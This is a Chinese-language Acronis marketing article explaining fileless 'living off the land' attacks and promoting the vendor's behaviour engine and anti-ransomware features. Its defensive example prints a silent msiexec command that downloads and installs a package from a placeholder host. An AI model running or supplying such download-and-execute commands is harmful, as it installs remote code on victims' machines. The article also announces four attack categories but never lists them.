面對來無影去無蹤的無文件攻擊，如何防御無痕跡的暗殺？

網絡這個無形的戰場上，每天無時無刻不在進行著戰爭。我們不斷提高防御水平，而魔高一丈的網絡犯罪分子也不斷調整或探索新的攻擊媒介。這就產生了“LotL”進行無文件攻擊的方式。這個概念已經存在了數十年，過去曾在Unix攻擊中大量使用，但是最近在Windows系統上又重新復燃。

無文件惡意軟件攻擊，真的無文件?

無文件攻擊的定義很多，但略有不同。簡而言之，無文件攻擊是指磁盤上沒有特定的惡意文件。無文件攻擊利用合法的應用程序和流程來執行惡意活動。當預先安裝的合法軟件被用于無文件攻擊時，該技術通常被稱為“LotL”。我們經常看到攻擊鏈的某些階段正在使用無文件技術，因此從技術上講，整個攻擊不是無文件的。與傳統惡意軟件的不同之處在于，它不需要安裝惡意軟件來感染受害者的計算機。相反，它利用了計算機上的現有漏洞。它存在于計算機的內存中，并使用常見的系統工具通過將惡意代碼注入正常安全且受信任的進程（如javaw.exe和iexplore.exe）來執行攻擊。這些攻擊可以在不下載任何惡意文件的情況下控制計算機，因此得名。

無文件攻擊為什么會增長？

無文件攻擊比基于惡意軟件的傳統威脅更容易實施也更有效。所以，網絡罪犯然會尋找阻力最小成功率最高的的途徑實施攻擊，這也正是越來越多的網絡罪犯采用無文件攻擊的原因所在。據Ponemon Institute的2017年“端點安全風險狀況報告”表明，成功的惡意軟件攻擊中有77％涉及無文件技術攻擊。早在2017年4月，黑客通過新型惡意軟件 “ATMitch”，以“無文件攻擊”方式，一夜劫持俄羅斯8臺ATM機，竊走80萬美元。在今年年初，全球40個國家的140多家包括銀行、電信和政府機構等組織遭到 “ATMitch”無文件攻擊，感染機構遍布美國、法國、厄瓜多爾、肯尼亞、英國和俄羅斯等國家。

無文件的攻擊方式

一種更常見的技術是發送網絡釣魚電子郵件，試圖欺騙人們點擊惡意鏈接或打開惡意附件，例如包含宏的Microsoft Word文檔。一旦黑客獲得訪問權限，他們就會直接從計算機的內存中運行命令或惡意軟件。他們經常利用內置的系統管理工具（如Windows PowerShell或計劃任務）來運行命令和惡意軟件。有四種主要攻擊類別：

Acronis如何保護您免受無文件的攻擊？

Acronis行為引擎會監視PowerShell和其他應用程序，分析它們在做什么以識別意外的，罕見的行為。這意味著，如果任何一種已執行的腳本進行可疑的操作，而這些操作可能導致系統受損，則腳本將被停止，管理員將收到警報。

讓我們看一個示例，看看將Acronis行為引擎與URL過濾結合使用將如何幫助您：

msiexec/q/i http://domain.tld/cmd-msi.png

1. Acronis行為引擎（ABE）看到msiexec是通過上述命令行執行的。

2. ABE在http://domain.tld/cmd.png上調用URL過濾。

3. ABE從URL過濾得知此URL是惡意的 。

4. ABE終止該過程并發出警報。

Acronis的基于AI的靜態分析器也經過了訓練，可以檢查正在運行的腳本的結果，從而提供第二意見和另一層安全性。如果攻擊者由于服務器未正確打補丁而能夠上載初始腳本，則意味著沒有漏洞評估和補丁管理功能。Acronis可通過利用嵌入式漏洞評估和補丁程序管理來幫助防御此類攻擊媒介。借助這些功能，可以在甚至需要Acronis行為式引擎或基于 AI 的分析器之前就停止攻擊。

另外，基于AI的強大Acronis的主動保護技術，即使網絡犯罪分子發現了新的漏洞或滲透系統的方法，機器學習也會檢測到勒索軟件的進程并阻止它們。

Acronis主動保護技術還保護備份文件。當犯罪分子開始攻擊備份文件時，Acronis主動保護技術是阻止這種攻擊的有效反勒索軟件，它可以阻止系統中除Acronis軟件外的任何進程修改備份文件。我們還實施了強大的自衛機制，抵御任何典型的攻擊，不允許犯罪分子破壞Acronis軟件的工作或更改備份文件的內容。機器學習和新的啟發式算法使Acronis主動保護成為針對當今勒索軟件和未來變體的絕佳的數據保護技術。

所以說，集成了備份和頂級安全性能的Acronis產品，是新一代的具有前瞻性的網絡安全的解決方案，不僅全方位的確保當下客戶數據的安全性，也滿足了將來復雜IT環境下的數據保護的需求。